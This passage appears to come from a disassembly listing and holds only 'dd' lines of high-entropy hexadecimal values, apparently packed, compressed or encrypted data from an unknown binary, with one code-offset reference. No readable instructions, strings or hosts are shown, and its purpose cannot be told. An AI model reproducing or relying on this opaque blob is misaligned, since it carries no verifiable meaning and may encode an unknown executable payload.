		dd 4426065Ah, 435B68A0h, 0C3D60983h, 602B9D76h,	30EC822Bh
		dd 0D7FE7239h
		dd 0C0457B44h, 8F7C115Eh, 0E8A3D209h, 8A2B906Eh, 7A395045h
		dd 7A828F60h, 115EBB23h, 0DB04FE60h, 1F55F708h,	91000000h
		dd 6000h, 424000h, 5000434Ah, 0
		dd 3C740000h, 25AC20C8h, 0A5D31220h, 6B7D4801h,	5F2BF335h
		dd 72B0D6E9h, 0F65A6629h, 0ED90DBACh, 245805CCh, 0E979A922h
		dd 6BF6A152h, 9ADEB859h, 6189B75h, 580510B2h, 0D81CA044h
		dd 62BBCEF6h, 677F29DEh, 0C02FBD8Ch, 4D664422h,	0C02ED10h
		dd 35762024h, 0AC76EC45h, 9ACFB0D8h, 0DAAD4B2Dh, 6DBA68B4h
		dd 0B8DC76CBh, 2EB7DF70h, 0E2F394BFh, 2836BBDh,	0D1287A62h
		dd 3D2242A1h, 0A5D3B46Ah, 0EA7D934Ah, 52A929B4h, 0B56A42A3h
		dd 0B35AD52Ah, 3ABBBD62h, 0AAA822C0h, 0AF842C08h, 284B05Eh
		dd 2821B85h, 90344603h,	2BC94234h, 769B2C18h, 0A1D2390Ah
		dd 73FEBE99h, 2502A660h, 23D0FE2h, 0F074FD80h, 6A664060h
		dd 7FC97DA2h, 8B6EA60h,	0AF509406h, 0C973AC60h,	427153B6h
		dd 52BEF45Eh, 0B4D6A23Eh, 42058275h, 28086903h,	0C4C67518h
		dd 56D4F6ABh, 8B9D02BEh, 7BC14E64h, 637E3EC7h, 0C9EFF942h
		dd 35FF63A2h, 1B10A091h, 181D004Ah, 45A15015h, 0EB40FB31h
		dd 7A713082h, 4CB05AB1h, 60F44F62h, 42D17B5Bh, 0F14E7C40h
		dd 80F342h, 1129060Dh, 0F6018610h, 2CACD89Fh, 2503814Ah
		dd 8949180h, 2A50608Ah,	0C9426128h, 0A50CD4A0h,	9D095283h
		dd 30E54A10h, 0A2CC4E85h, 143D0B47h, 830A7901h,	0A24C9628h
		dd 14855114h, 0C2150903h, 869D3A6Ah, 4AA4053Ah,	4D825063h
		dd 3055C315h, 0AD8C2ABBh, 5290967Ch, 4A38315Bh,	0AB3A2570h
		dd 160195C9h, 2C10CC6h,	882CAD3Bh, 11921609h, 52941A76h
		dd 21682C8Ah, 0B48CB3CCh, 0D3B65A43h, 0DCE6E169h, 0E9D1ED41h
		dd 819820BAh, 8B32883Ah, 3E61A1A2h, 881D6865h, 0F43285D1h
		dd 0FE2B18C1h, 8025B7A3h, 0FA2A276Eh, 0DAACE553h, 365EBDC0h
		dd 29DE0501h, 0D82F8E2h, 49920BFDh, 17A01A02h, 0FD025E60h
		dd 5C604DD9h, 0D3FE7450h, 1445155Fh, 0A12F9602h, 82F01D65h
		dd 8607AAh, 2121626Dh, 7A4C1296h, 9C400EF8h, 0A594AD6Eh
		dd 95C12188h, 54444A24h, 4312289Ah, 0E4F4A309h,	4B588CA5h
		dd 2BA2211Ah, 0A989946Dh, 962551C4h, 91E74792h,	18991F4Bh
		dd 90A532A8h, 21220021h, 0E54298F3h, 0A12B4BF1h, 84AFF097h
		dd 12FECA5Dh, 4BFE4972h, 0C99525C4h, 568096D0h,	0F4092A35h
		dd 0A711B00Eh, 0C6D83E81h, 10384E9Fh, 14A3205Ch, 44E10B6h
		dd 0D8D4A063h, 0D8E4CB23h, 8F64A109h, 8A3D7B1Eh, 0B26811ECh
		dd 71839247h, 0D618F40Dh, 2A9D2F0Ah, 40F5A811h,	64AF92ACh
		dd 16328AC3h, 0A5A6D96Fh, 5592970Bh, 22B1DF6Eh,	0C87D7178h
		dd 8E7BD0h, 225850C6h, 895E212Ch, 256804AFh, 955112B8h
		dd 54044AC0h, 4C122A42h, 284AA689h, 81289625h, 84A24894h
		dd 1286E251h, 4A088944h, 0E8872508h, 425E97F3h,	6076C12Fh
		dd 0A00202ACh, 0B7890087h, 0D4253C84h, 30966D12h, 42579C4Bh
		dd 942512Ch, 950B44ADh,	52E0608Ah, 53D02F5Eh, 0D813219Ah
		dd 0C0339C63h, 2252F2FEh, 4F2BA064h, 0B02E54Fh,	0CE0AD0BAh
		dd 71942ACAh, 26014172h, 610BD329h, 10220BAEh, 9ECA9956h
		dd 88D08D38h, 241A0AC1h, 32580197h, 6985065h, 0C06965C8h
		dd 201A7F9Ch, 30E44197h, 86A54004h, 187A4081h, 5BC01802h
		dd 8185FCFh, 4CB90D18h,	0F5B2A47h, 0DC3290DEh, 7600C10Dh
		dd 97D1E643h, 5EC48618h, 423F285Ah, 3793A2A9h, 311CF00h
		dd 90DFD6F1h, 0C70DFF3Ch, 18B28FEBh, 0A2E9F002h, 0BC105E84h
		dd 2191780Ch, 4A48DDC0h, 292AA5D8h, 0A4C99751h,	0BC015CC4h
		dd 0FA67700Ch, 0FB3DDF0Bh, 0C6DFE1D8h, 1091F7F5h, 8F0B300Ch
		dd 0C1830A22h, 1B5C0284h, 0F87C0818h, 81DA1830h, 0AA397FE4h
		dd 5428A153h, 0EE44B1FAh, 21108C81h, 20CA2A34h,	30622AF8h
		dd 0A7699A8Fh, 80CC91E4h, 5011569Ch, 0F34ABA5Bh, 4260EA25h
		dd 2B692301h, 0C9D39539h, 5DDE5634h, 3B44B4C6h,	7C872062h
		dd 65E0BA69h, 4AD88828h, 0E167234Dh, 0AB405579h, 1340E8C8h
		dd 81353CF9h, 0C7407F80h, 0D467650h, 850CE8F4h,	63249CC0h
		dd 0DB6761D9h, 9D0095Fh, 44154D04h, 0F508E56Eh,	67218333h
		dd 4387458Dh, 0A49F88B5h, 29800F45h, 22C84892h,	79BECB66h
		dd 4137A483h, 0DE3A8CA6h, 0A1F6FC98h, 0C7386889h, 71D9F339h
		dd 3DB55D3Ah, 0F51A07C3h, 76D2B84Ah, 5DFEDE2Eh,	0B1AC77A1h
		dd 33EBC97Ch, 0B8E5753Eh, 5A1CC19Dh, 8D94BAF9h,	0C77F3A0Bh
		dd 513EBF3h, 89633BFDh,	0B727DB81h, 3ABACA60h, 0FE934E4Fh
		dd 7A16E7Fh, 1BC11FBCh,	0E039DB7Fh, 0D64F8CF4h,	0DE61347Dh
		dd 593C5141h, 0F7B86D75h, 9423E71Bh, 777B782Fh,	0FDFABDDCh
		dd 0AA8DF39Dh, 0E6BBEFDAh, 9F290F43h, 98178F9h,	25114CBFh
		dd 0ABF19351h, 0E3E208BEh, 477DAE2Dh, 0A7CFF13Fh, 0C34A7A7Eh
		dd 79F4EE5Bh, 338FBD65h, 69B55B2Fh, 0CF8F9187h,	869EDA08h
		dd 2EB84746h, 4BB78BC3h, 4DAC1C31h, 9A7C2691h, 773550BCh
		dd 0BDB59CE6h, 0FCB5DC6Ch, 14A133C6h, 7B25D9EFh, 98D3EC5Eh
		dd 320E5AFFh, 4B8C7C34h, 7A3F0553h, 689F9BD8h, 5DC4DC5Dh
		dd 767D624Bh, 0F1F3FE7Bh, 0F45C5657h, 0DC0593EFh, 0C9CD83DDh
		dd 18A8BA99h, 0C1C4E5E4h, 5BED154Ah, 0C00892DDh, 0F73F39BCh
		dd 615D6013h, 0C005B8CFh, 6B567D1Dh, 7E9FBF07h,	0DBA249DFh
		dd 0A9DE8DCBh, 5965583Fh, 0AB111F4Eh, 47E28CF8h, 0F917DBFh
		dd 0F1B277A1h, 2E9FE128h, 81A67ACEh, 6D9ADC76h,	0F66FDB5Ah
		dd 9D99F82Eh, 942B86F5h, 0AB94CF77h, 0BCE7D797h, 0D25CDFF5h
		dd 1223785Fh, 6AFCEB0Eh, 0F4CA77E6h, 9BC48765h,	32BEDF86h
		dd 0DC91DF65h, 0EEEB6E49h, 0C50F9A9Ch, 0E77B44E6h, 0D652E6B5h
		dd 0D6C7D67Dh, 0F3077345h, 3E37B63Ch, 0BA9D6492h, 38BB8B79h
		dd 0B55ACC6Ch, 0FDB1D1D2h, 225BCF06h, 0DEBFA9DFh, 8D83BAF9h
		dd 5858BA5Fh, 88126FB2h, 0BE99AFEEh, 3FAA04F4h,	951BC949h
		dd 343EFFA8h, 92F9BEEBh, 776A4DE5h, 1DEE46E8h, 91D5B3EBh
		dd 3FFE0DCCh, 3D292EF8h, 466F4703h, 2D0EFA9Dh, 0D64F5639h
		dd 9E8C63C0h, 47CB2438h, 0FF7AE305h, 0E622EE08h, 8DECF3BEh
		dd 3C36B108h, 778D7D1Eh, 0D0A09A06h, 0CDD684A2h, 974EFB6Ch
		dd 18E76FDBh, 6665A677h, 0E42B4A46h, 361FEEA4h,	0ABF6539Dh
		dd 233A7DC0h, 0CBC5B4B8h, 44742DACh, 0FD1268D9h, 884BF52Ch
		dd 9F24B3B7h, 34A724B4h, 0DCEBB66Dh, 7D66D4F5h,	0E07759CCh
		dd 0DFDF09A4h, 1ECFB857h, 15AAA38Dh, 79BF79F1h,	0E451BE46h
		dd 2ECBA860h, 99C78A75h, 0D94B62FEh, 2E3BEBE0h,	774BEC44h
		dd 0EEE9D9FEh, 88C99104h, 0D09CBB0Eh, 429DE87Ah, 16A87FC0h
		dd 0B8D645AAh, 45E7525Ch, 8536C5B0h, 0A34CD985h, 9998A64Ah
		dd 7B76229Bh, 0B34D2A64h, 0D32E854Eh, 903D7843h, 0A3EDB9BBh
		dd 4B088AF7h, 1884746Bh, 0D9290230h, 3DFF3E40h,	314D028Ch
		dd 0A5D99242h, 0FDF3BF27h, 7E869F4Ch, 0AB92492Ch, 0FF0C04h
		dd 4555FB0Bh, 2912B962h, 28064809h, 7FF2AAAh, 0A805918h
		dd 0FF4200h, 19CA6723h,	0FA28E8A0h, 300FC03Fh, 19C0673h
		dd 0FFA1FE8Ah, 32D2EC03h, 0FA280540h, 9807C03Fh, 0CB065Ah
		dd 0FFE8FF45h, 6C605B00h, 824BA019h, 86C41552h,	0B69D706h
		dd 270723D5h, 767D299Fh, 924FE9D8h, 373C4EEh, 0D5FA56Fh
		dd 3F5F89F2h, 7A69F0F8h, 72A4F3C4h, 1789B3CAh, 0E7AF04B0h
		dd 2BC2BEE4h, 81E0D9FDh, 8C842752h, 0C136B61Dh,	4F29330Fh
		dd 0FB4C5FD0h, 0C6B7CEA1h, 2574E1A4h, 9F18F1EBh, 0B931AFCFh
		dd 0CCD6DAE2h, 0AFDEBCA5h
		dd 3D836B7h, 87D5CF02h,	32FC8786h, 0B3979A43h, 43B45BF5h
		dd 1F9AF5FAh, 2FE39FDBh, 0A9F017E8h, 57E9A1E6h,	5D0ACC47h
		dd 1878F7EAh, 0DD7F1F8h, 9BC3BC27h, 4D76C993h, 0B5D0E33Dh
		dd 15CBC699h, 15731686h, 95EFE370h, 3351312Ch, 0CD78E789h
		dd 4BBE3B50h, 0B3BE6933h, 1B1D173Bh, 7B74DE23h,	8F62363Ah
		dd 4CD99419h, 5C59A59Dh, 0D0A59E1h, 0A99F50A0h,	0BA67F7B0h
		dd 0DC47B59Ah, 676FB79Dh, 936B81C7h, 0CBA5EB1Ah, 9F33FDF6h
		dd 19446DDh, 0F9E7A9EAh, 0CE63B721h, 214A25D7h,	36316542h
		dd 40708BD8h, 7F15F837h, 47300C7h, 9E19F188h, 7E1BD541h
		dd 0BCA4EBE4h, 0A9B33874h, 8A4FECACh, 4DB30BA5h, 0A5173DD5h
		dd 96587538h, 7FA94747h, 0A6F1EE51h, 0B461DB55h, 4B7ABDCEh
		dd 445793C7h, 12A3D99Ch, 4C5C0C02h, 0B9B13378h,	455B447h
		dd 0DCD1EA09h, 1D8341C3h, 37A1050Fh, 1C198243h,	0F7D8219Ah
		dd 300AC54Eh, 0D601CDA0h, 67D222D6h, 0D72B7757h, 711CC686h
		dd 0FFEFF2F9h, 88470F13h, 1412264Ah, 60F428BBh,	562A753h
		dd 0C0103A99h, 43640486h, 720978C0h, 4BC17581h,	1CC40802h
		dd 25601A11h, 80811404h, 469E32Ch, 12B404F0h, 4AF08957h
		dd 2C422570h, 0B38995F1h, 0D8255944h, 70966A12h, 25CB44Bh
		dd 8975F12Eh, 25E444B9h, 97F112EEh, 1084BE0h, 84A421BCh
		dd 12988251h, 4A80094Ah, 2A822538h, 0AC099521h,	0BA255584h
		dd 8965B12h, 0A2597C4Bh, 896B312Ch, 25B4C4B4h, 973112D8h
		dd 5E044B80h, 7D122EC2h, 4606BD89h, 28A2FC24h, 0A4898431h
		dd 9A2551C4h, 80954B12h, 42543C4Ah, 955112Ah, 2560C4AAh
		dd 95C112ACh, 58044AD0h, 63122BC2h, 984BB109h, 0A12DC825h
		dd 44B74096h, 12E4625Bh, 4BB00970h, 2F2225D0h, 0BE899771h
		dd 34A45EC4h, 119028FAh, 4A605520h, 29E22528h, 0A90994E1h
		dd 0AC255404h, 0E8965412h, 4259644Ah, 896B012Ch, 25C804B3h
		dd 974112DAh, 5DC44B98h, 7D122EC2h, 4210BC09h, 28A22305h
		dd 0A4899431h, 982551C4h, 78954B12h, 6255384Ah,	8959112Ah
		dd 257444ABh, 962112B4h, 400D4B00h, 0E082C82h, 20E81C83h
		dd 213008CDh, 9424209h,	21294AD9h, 6322F897h, 0CC059F27h
		dd 1F85742Fh, 707EAE28h, 8BE662A4h, 38A5BFF7h, 0A8F11E4Ch
		dd 2EEBCD22h, 749A9AA6h, 7D6A3C29h, 0D200A8D8h,	4A4DC62Eh
		dd 5BB7180Bh, 0EFA2075Ah, 0C7CA3687h, 0E0F29289h, 3ED5E908h
		dd 0EF9DE1B0h, 0BE7A03D7h, 9A99F7EEh, 0CC5EF62Ch, 2488776h
		dd 0A084194Bh, 7877E205h, 0B2DBCB71h, 4BAC5B95h, 11A16FB7h
		dd 955385C9h, 0C131CEABh, 5920565Bh, 81A8C8E0h,	0B0067409h
		dd 9AD0662Ch, 7AE15C23h, 34C61C84h, 0C42029h, 0BFC794BEh
		dd 0DECFF32Bh, 0DEE653A1h, 20854611h, 49E13066h, 56A12592h
		dd 46A59E86h, 45BCBF9Bh, 7549F70Fh, 1B521571h, 215327F3h
		dd 0D670DD34h, 5777245Fh, 0F62AA83Ah, 36C6F98Fh, 437F1DE8h
		dd 782C2D62h, 26EFE7h, 0D0CF1E8Ah, 5A78D480h, 0E5845DF4h
		dd 1F20A40h, 4A848C03h,	0EA8CCA04h, 4E24AB9Ch, 38550F12h
		dd 8984FB14h, 0C10D8202h, 0F653D39Fh, 2168181Dh, 0A7DA5089h
		dd 0FA2D89A1h, 71AEEC7Dh, 0B48406BFh, 0E9BDA6Ch, 22C0B586h
		dd 0A6BE2DB5h, 14E73FEEh, 286924F0h, 0D41AF8F0h, 93FDE036h
		dd 0C4DED3EBh, 0DAEDDE84h, 4A5402B6h, 71A89EB7h, 0FFBDEA7h
		dd 8003AF0h, 0EB74FCBCh, 0EF1585CEh, 4A92B7D5h,	6BB84B15h
		dd 0D09E62B1h, 25809F3Ch, 9FFA9E2h, 318CCBA9h, 0F2BFA64Bh
		dd 9CA1FAE3h, 56182C11h, 0B3724C51h, 0E7AFE977h, 0D4E8CA3Ah
		dd 0F26503B6h, 74FB36BEh, 0A990B485h, 96EC4D16h, 45EF1F6Dh
		dd 49A89EDFh, 0D875D26Eh, 0C63823EFh, 1601026Ch, 0D638B283h
		dd 792D0C21h, 69B35DB7h, 771E268Bh, 31B7D46Dh, 0B2C91024h
		dd 42003274h, 1D809FAEh, 2B9C461Bh, 0E3F991D2h,	701807D7h
		dd 0BE18FA61h, 2FB92264h, 23384FC1h, 0FE86F39Fh, 0FEC432A7h
		dd 58F49FCh, 9FE3CC94h,	0EA5F9610h, 4530E4Bh, 8589E057h
		dd 73E9EC10h, 9DF87DC2h, 0E1FE80F9h, 641FC89h, 5064C54Ah
		dd 7C7C2DFh, 6680C5Ch, 0C1400877h, 21819972h, 3C757B0Eh
		dd 325FB1F5h, 0C01C035Fh, 6039164h, 8484FA7Eh, 0FC3F041Ch
		dd 543000B1h, 0A850E706h, 873D3E21h, 3F2F1615h,	0E7F755BFh
		dd 33F8A613h, 161F53F8h, 34B140C8h, 64012585h, 4F61D849h
		dd 0E0762B1h, 98324F43h, 40A00B1Eh, 2276B04h, 304D701Dh
		dd 758CF254h, 858F03C1h, 0D65D258Fh, 16194246h,	92C61621h
		dd 0E9500360h, 0AC2EE7DCh, 3F384C58h, 41B5809h,	80622FB0h
		dd 3E10D0Fh, 0CC1C2CE6h, 0C068F97h, 0C9221671h,	1E80C12Fh
		dd 998680C8h, 0CC7E4050h, 8A02C055h, 3242305h, 28637C8Eh
		dd 46C8491Bh, 0F8640993h, 7629E231h, 178ECC72h,	27C68B53h
		dd 0E1110700h, 3C461AC2h, 4B0CB239h, 0A9DA5CF6h, 0FEFDCB0Dh
		dd 0C00992D8h, 6937C4B6h, 0DAFFEFD9h, 665C2775h, 0CEB36683h
		dd 3464E688h, 96E0DDA5h, 0E351996Dh, 1B94D2A1h,	6EBA2CB6h
		dd 0C4CC8283h, 66E85A6Eh, 85B2DD6Eh, 0B292B6DBh, 0A4DDDF79h
		dd 79629D1Bh, 716B24E0h, 95BE028Bh, 0B417093Bh,	0A5ACEB67h
		dd 0A789BB81h, 0D01AB182h, 0C0828245h, 2F250ADCh, 75BAC658h
		dd 65A8059h, 8B5C0388h,	0ED616D84h, 71AA01E2h, 0E81F0249h
		dd 0C50465BEh, 6508856Ch, 1683E2EDh, 42A4CB0Ah,	50815720h
		dd 2A0597B7h, 2946B020h, 0ED602A60h, 76FBAD8h, 0B42AA0Bh
		dd 0F2E236DBh, 0A3AC1653h, 0DA603FC8h, 8083C054h, 2763B445h
		dd 12C60802h, 4B680856h, 4E60259Ch, 23CC93BCh, 819A2020h
		dd 95598D81h, 751D965Fh, 0EF7EE844h, 0ECDF57E9h, 0A36A0118h
		dd 3C7B83C5h, 0F6A3EF36h, 0BEF2427Eh, 0EFA45F8Ah, 7A85623Bh
		dd 0E7E9213Fh, 0BFD796A4h, 0BDE95FD9h, 225DAC9Fh, 4A09C2CDh
		dd 0EF5C9C89h, 17D134FDh, 1ADE089Ch, 0DC68F977h, 4187601Dh
		dd 0CB9D447Dh, 64BAAC76h, 0D01F36DFh, 604497B2h, 0EE9650C3h
		dd 7B91B759h, 355F8AF9h, 88162B79h, 0ED361E31h,	7188B7D9h
		dd 46CF361Fh, 33E2167Dh, 8B19F52h, 0D6DB96C1h, 0AB50B0E7h
		dd 0FB0C25B2h, 0A631A209h, 9A856944h, 0A9346794h, 0C2E511Dh
		dd 0A52AAA73h, 0A80C546Ah, 252E8D98h, 45EA343Ah, 9542CB79h
		dd 0F2B24550h, 0D55692ABh, 595A30E6h, 0A734E08Ch, 0B7DC5172h
		dd 51852774h, 596E1861h, 0CC613CA7h, 0E6C38CBEh, 5A25B5E6h
		dd 172C8ED5h, 70FC418Dh, 736C761Bh, 1C1A1527h, 7158C5E6h
		dd 0C5006998h, 1759299h, 88009116h, 0FDF0h, 0
		dd 0B0000000h, 434A0043h, 1000h, 0
		dd 20F33610h, 32289FF4h, 0A78063B4h, 11846C5h, 8533D094h
		dd 11842601h, 0D2D765B9h, 5B8A5B26h, 73297590h,	0B1261228h
		dd 0F65BA536h, 0DE7EEA7Ch, 0C522C36Eh, 542F414h, 4A65BCE9h
		dd 0C2B69B15h, 0C8B93BCDh, 5892A81h, 0CB7D8CEDh, 90917377h
		dd 324C7051h, 6F169057h, 6114AB5Ah, 4F5D2EB6h, 1B650458h
		dd 141843Ah, 8C190485h,	29A52B00h, 8DC12C2h, 25944B48h
		dd 930C3A00h, 35D6E6D5h, 0A355394Dh, 1A5B0D9Ch,	0B50ADF78h
		dd 6934FA04h, 8952ADC8h, 0F8C03EFBh, 0EE112200h, 2 dup(0)
		dd offset loc_43C000
		dd 3B8434Ah, 2,	0E6B20000h, 108F20FFh, 64940A7Dh, 0FC20FD0h
		dd 9012539Dh, 2CD64FAEh, 7FE03E90h, 64F8E0E1h, 66E31DB8h
		dd 0A0473E28h, 0FDE1633Ch, 496B41F3h, 1BEBD902h, 0E1D8700Ah
		dd 0C92540D2h, 7A7FB0F3h, 0CB357C37h, 0AC8B5380h, 1DBC9680h
		dd 0B82F3821h, 4412D218h, 3F8CE379h, 7FD5284Dh,	46D1441Eh
		dd 787B7E0Dh, 9A9ABD3h,	2552359Ch, 176A0623h, 8A64069Eh
		dd 0E0F01F8Ch, 1F970891h, 0FCFD20B8h, 474A4F95h, 487F1AE3h
		dd 614D79A3h, 1DA6B188h, 7CA4721Ah, 0D15C7FB3h,	8102B511h
		dd 49D08311h, 0AE24FFAh, 0E188C3CDh, 0A291FDD5h, 2B3F014h
		dd 228984F0h, 61E53D78h, 8E2F18CBh, 185E924Ah, 0A175905Eh
		dd 8C09D11Bh, 1E872475h, 0D331CFC5h, 0A3B7620Ch, 6F2966BDh
		dd 5606CB45h, 8129A381h, 0D527F21Fh, 1FCE1AD3h,	0C80685FDh
		dd 0F60FF4F7h, 0B6FD17EAh, 0A5E3B612h, 0DED42362h, 3C0F8002h
		dd 6F8BB1F3h, 25E20A49h, 0B1D7E778h, 66F08049h,	80C362E6h
		dd 0B795E6A4h, 0D4AD3BECh, 0FDF29089h, 0C0FA175Eh, 0A84D2F5Ah
		dd 28BCA4BDh, 809FCBFh,	2CD5566Fh, 6B1FCC3Fh, 40AE9C23h
		dd 0B83E9350h, 0A289E7FFh, 25AFB875h, 55694950h, 8F8DB570h
		dd 6B22E1A5h, 998F86E9h, 0E5FD5F93h, 0CFAB79B8h, 0C3013558h
		dd 0F78D645Fh, 0A9429BF9h, 82F0076Dh, 0ABB1DF68h, 3CD8C32Fh
		dd 2FC76AC2h, 0F069A467h, 2C319C17h, 0E8A6AABDh, 14BC7FC4h
		dd 7B1F3BB0h, 513DDEBh,	398D1B94h, 9401132Bh, 0C925A1D2h
		dd 0F7FD30F1h, 0F2146F03h, 87AD728Ch, 0DA3A9581h, 0AFE476A9h
		dd 799311DAh, 497F1538h, 0DF9B346Eh, 6C7B9DA7h,	0BFDBE107h
		dd 65077F68h, 0E7EB77BEh, 0F003682Dh, 0FFBF5EFBh, 56B6A047h
		dd 8CA46A9Dh, 0BFDA2236h, 4AA0307Ch, 0BC044CADh, 489D03BEh
		dd 60310DADh, 4AC950A1h, 0A08F665h, 6BF56D1Eh, 31F5D73h
		dd 0C58A87Eh, 28B9E40Fh, 0A5F23C5Ah, 0F356D260h, 5F84F6A8h
		dd 203878D0h, 0B2674441h, 5E24DA2Fh, 8B5CD205h,	24C395AEh
		dd 5B1EC3BDh, 231A9503h, 482FA435h, 4431541Ah, 0DAC3FBA6h
		dd 84D5303Ah, 5BF093Eh,	0C17941B6h, 42FF50F4h, 5711AA1Bh
		dd 0DC86AFA4h, 3FE76805h, 99C474E7h, 86BA8FEEh,	4682C7F3h
		dd 0B44AF849h, 0D4EAB412h, 8A1418DEh, 18264D4Eh, 2B0C530Fh
		dd 0AC05F6EAh, 9650154Dh, 44D013A5h, 0F02C5097h, 3FE05854h
		dd 0A113E459h, 2E53004h, 44220BABh, 589FAA0Eh, 5338AE71h
		dd 6CB5F716h, 83E70530h, 12A0A8B2h, 0F387E161h,	0FD56A0F9h
		dd 5BFCF7A6h, 8D9E9332h, 5A3C5FA0h, 4E2BC13Dh, 8D728C04h
		dd 0B509AF68h, 1F5BBA53h, 0A108CF05h, 1229AFD9h, 83AE2245h
		dd 2CCC3EA8h, 0BFCFAABBh, 79A4E2EAh, 0A1F1B4AAh, 0D4D41FCEh
		dd 34537784h, 80AC888Ch, 812C450Dh, 1731BE4Eh, 203F14ABh
		dd 508AC2FAh, 410BD92Eh, 2F05CF14h, 11D27DAAh, 92C7425Bh
		dd 6A8BC305h, 523C2BD9h, 69E3FC2Eh, 0AB060489h,	3405ED4Ch
		dd 0E655AE0Ah, 773B9FDFh, 0AEB8B7AAh, 3BC117E5h, 0A801716Ch
		dd 0D352C907h, 45575696h, 6B53C5F5h, 0D5464941h, 764C97A1h
		dd 7C84332Dh, 91F4E1DBh, 0E44D3F13h, 85A97DBCh,	5F68CC5Ah
		dd 74E711D9h, 5FF62C64h, 1108030Ch, 1CA0BA30h, 0ED342E5Bh
		dd 0E41911F5h, 0B726D1C1h, 0C5AD03CFh, 0AD34B9DCh, 0E088917Fh
		dd 0AB2A6C04h, 1A2F347Eh, 53E96344h, 0FE21F312h, 66CCC1B2h
		dd 0D0210213h, 0DC6801E1h, 6108DBEFh, 3C9F2BC0h, 0A1F9C0DEh
		dd 4C5A66FEh, 2BA04E03h, 0FB86240h, 0CDA6F284h,	0B656900Ah
		dd 2FBAE87Fh, 52AEBA9Eh, 2096A4ADh, 703F8EA8h, 0CB919856h
		dd 0E1351875h, 0DC7EF22Fh, 0F4827F9Dh, 5271FC10h, 36443975h
		dd 0DE5890FCh, 0AE17AB44h, 0FBF465A0h, 0E2D23F93h, 95059A40h
		dd 9E73FD72h, 916CDB6h,	9B09E303h, 33EFC2B7h, 19A9DDCFh
		dd 90D9C2F4h, 294A6DEEh, 6DB0B872h, 26077628h, 0F2F59888h
		dd 3B7CD1Ah, 2D53B7E1h,	0A94BF7DAh, 0BDAFCC1Eh,	3C38AB69h
		dd 0A61B62B8h, 0AF97DA97h, 0AD146DC7h, 0F055F591h, 920DD743h
		dd 6CE0E62h, 361107CEh,	2B3FA750h, 3F81070Ch, 8D310F17h
		dd 0EDB78482h, 329D8A0Ch, 5914C6F7h, 22DCE09Ah,	8818FAEEh
		dd 5584488Fh, 564B6097h, 82CF4DB5h, 109EA7ADh, 8FCBEA8Eh
		dd 3193FD90h, 9AEDAFE7h, 836F0D22h, 53137A5h, 0AFA6794h
		dd 8895DE68h, 1FC0B496h, 0BEFD864Bh, 1A74F2A2h,	9DCC5638h
		dd 0C9C5B9A5h, 0CEF23A8Eh, 0FC00AE83h, 0CEB1FF13h, 0ABA3EE77h
		dd 2159092Eh, 0D2B46A60h, 0C288C8BAh, 3D6870BEh, 0A252579Bh
		dd 0AC2FA0D0h, 649225B5h, 0A8191D64h, 6CF5CF91h, 5EC04B47h
		dd 0D50CCE23h, 0EFC6FBB5h, 0EF98B41Fh, 441FA02Ch, 7D1758E0h
		dd 0EF1E9A81h, 1C47818Bh, 0E30DC3D3h, 6FC5217Fh, 4792B893h
		dd 73A7A21Fh, 0B0797954h, 0D84444F0h, 24A35C37h, 50853538h
		dd 45CD6079h, 99BDD2B7h, 0D6BE4F38h, 7EF0984Ch,	0A8B643F1h
		dd 474597ACh, 0C3DD1154h, 53223108h, 4056F625h,	39C5B5EEh
		dd 0EC94BDE8h, 31645224h, 838F846Bh, 0C8E66AA0h, 0F12AF12Dh
		dd 81660EF2h, 82C91797h, 15FECFF6h, 0BAA607A2h,	28CB8178h
		dd 0AB6C71F2h, 0CAC4AB7h, 1D7FB50Dh, 3447C3F0h,	0F041B364h
		dd 8DCEA383h, 8AACEA36h, 1CBA86D7h, 3EBD81EEh, 0A95493C7h
		dd 705E6A98h, 0BD6C65BEh, 973ECCCCh, 1A786A21h,	3083B5D4h
		dd 0B19B3901h, 0DD45F12Ch, 954B4406h, 8C6F0E6Eh, 37D8073Dh
		dd 0B1D7688Bh, 0AA165318h, 13C7AC7Bh, 4898F6Eh,	0E79BB871h
		dd 87A48585h, 0B0FA9FA8h, 6CE4A27Dh, 60182C60h,	5E5932EBh
		dd 0C46E47E7h, 88FE884Eh, 0C1A17F7Eh, 57C4792Ch, 32062BEDh
		dd 0CBA196B3h, 53A3CE9Dh, 1C50A068h, 0E7252CEBh, 0DA8378E4h
		dd 2B79712Ah, 1D8A0450h, 0DBC0CB3Ch, 0D189B682h, 77E099Eh
		dd 4C17DFE8h, 0D98D5A8Ch, 0D98F60F6h, 8B7B2F9Ah, 0B5F82B5h
		dd 6DE7FC2Bh, 57B4B88Dh, 0D13942A5h, 0E9B079E6h, 160A302Ah
		dd 0B7A2CA01h, 0D1ADC371h, 6626B4B0h, 0D305F701h, 43A22220h
		dd 0FE0C4809h, 4D5E0745h, 17B02DC6h, 1AF4019Dh,	2DFF2C2Dh
		dd 8CEE425Eh, 68560D58h, 8C62E8E6h, 7FA77F79h, 82D9B24Ah
		dd 0D17DCA0Bh, 160058C5h, 4FB08528h, 0F2E91C8h,	0BEBEFC6Eh
		dd 0D9162C0Ch, 94F44764h, 0BA60181h, 78D99F19h,	7F443065h
		dd 66A7CBB3h, 0EEFEEA4h, 156A8BECh, 97040791h, 0F6A2A8D2h
		dd 0A4661699h, 44B52E08h, 6582701h, 6C9BE3B7h, 71E8ACA7h
		dd 66D668F2h, 16E7688Ah, 5C319403h, 103C15DDh, 0DC1E52FDh
		dd 262CE7Dh, 0B5173C7Fh, 94D1D1BBh, 0EFF3039Eh,	0C77B980Fh
		dd 0AD24EF42h, 269974B8h, 76489EA9h, 0BD92D1B1h, 17CADD8Dh
		dd 0C9836D19h, 13EC8571h, 7C55704Ah, 9B2BAD60h,	46C33FEFh
		dd 6E87C1E1h, 5DF18643h, 0EFEEE360h, 7D746CA9h,	0B185F5CDh
		dd 0F1BEE26h, 90C4098Ch, 0C79753A6h, 941E41D7h,	8F885081h
		dd 8F343013h, 0E4EB8272h, 2F54B365h, 6D6E2096h,	84140512h
		dd 307C59B0h, 4DD5A97Eh, 26DCAA03h, 91C189D8h, 0DAC43099h
		dd 0C2FE856Ch, 2CBC4CDh, 1A29C3AAh, 4AC4F5F5h, 0DF563911h
		dd 0B4964D1Bh, 36BF5CF0h, 0E57BDF55h, 597E81E7h, 0C542BB4Eh
		dd 60F53F8Fh, 5AEC9862h, 9918FB45h, 228EB88Eh, 0B55AC2CEh
		dd 948562Fh, 2E617BE5h,	9C13F40Dh, 9454B396h, 0B496DBE3h
		dd 0D5859ED1h, 359BD2BDh, 59548B89h, 2C1E2145h,	0A36EE875h
		dd 0BF41D05Dh
		dd 0C7D7EAB8h, 365B2914h, 0E7810650h, 0BD6F76D4h, 2D4513D8h
